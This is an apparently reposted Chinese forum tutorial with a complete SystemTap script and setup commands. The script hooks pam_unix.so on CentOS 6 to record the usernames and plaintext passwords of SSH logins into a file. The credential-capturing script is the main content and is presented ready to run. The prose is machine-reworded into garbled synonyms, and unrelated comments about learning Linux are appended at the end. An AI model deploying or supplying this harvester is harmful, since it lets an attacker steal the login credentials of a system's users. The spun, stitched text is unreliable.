带来一篇centos6.x 抓取ssh登录的用户名和暗码
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的小伙伴们!systemtap是一款十分壮大内核调试工具,能够debug良多关于kernel层的成绩。Linux是经由过程PAM模块检测用户信息和认证信息的,从而断定一个用户是不是能够登录体系,使用这个常识点,利用systemtap捕捉一下pam_unix.so该静态库文件的函数挪用,取得用户在ssh近程登录时的用户名和暗码吧。测试情况:CentOS6.432bit
内核版本:2.6.32-358.el6.i686
起首装置以下rpm包
yum--releasever=6.4update
yuminstall-ysystemtap
debuginfo-install$(rpm-qf/lib/security/pam_unix.so)
创立文件,写进以下代码
touch/root/capture_pass.stp
·#!/usr/bin/stap
·globalusername,pass,isSuccRet=1;
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password")
·{
·username=user_string($name);
·pass=user_string($p);
·}
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password").return
·{
·if($return==0)
·{
·printf("User:%s
Password:%s
",username,pass);
·isSuccRet=0;
·}
·}
·probeprocess("/lib/security/pam_unix.so").function("pam_sm_open_session")
·{
·if(isSuccRet!=0)
·{
·printf("Loginviasshservice.
User:%s
Password:%s
",username,pass);
·}
·isSuccRet=1;
·}
付与可实行权限
chmod+xcapture_pass.stp
创立一个纪录暗码的文件
touchpassword.txt
实行systemstap剧本
stapcapture_pass.stp-opassword.txt
当地实行capture_pass.stp剧本,同时ssh近程登录体系,即便第一次登录失利也没有成绩,不会纪录实验输出的毛病暗码。登录乐成后ctl+C停止剧本运转,检察password.txt,乐成捕捉。systemstap很壮大的利器,以是只要超户可使用。
来自:https://forum.90sec.org
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的好朋友们!
带来一篇centos6.x 抓取ssh登录的用户名和暗码
有空一起交流一下 如果上面的措施没有解决问题,此时你就需要Linux社区的帮助了。 Linux的使用者一般都是专业人士,他们有着很好的电脑背景且愿意协助他人。 我学习Linux的心得体会 ,希望对大家的学习有所帮助,由于水平有限,本文难免有所欠缺,望请指正。 掌握硬件配置,如显卡,声卡,网卡等,硬件只要不是太老或太新一般都能被支持,作为一名Linux系统管理员建议多阅读有关硬件配置文章,对各种不支持或支持不太好的硬件有深刻的了解。 学习Linux应具备的。[书籍+网络资源] 随着实验课程的结束,理论课也该结束了,说实话教OS的这两位老师是我们遇到过的不错的老师(这话放这可能不太恰当). 目前全球有超过一百多个Linux发行版本,在国内也能找到十几个常见版本。如何选择请根据你的需求和能力,RedhatLinux和DebianLinux是网络管理员的理想选择。 主流Linux发行版都自带非常详细的文档(包括手册页和FAQ),从系统安装到系统安全,针对不同层次的人的详尽文档,仔细阅读文档后40%问题都可在此解决。 感谢老师和同学们在学习上对我的帮助。
页:
[1]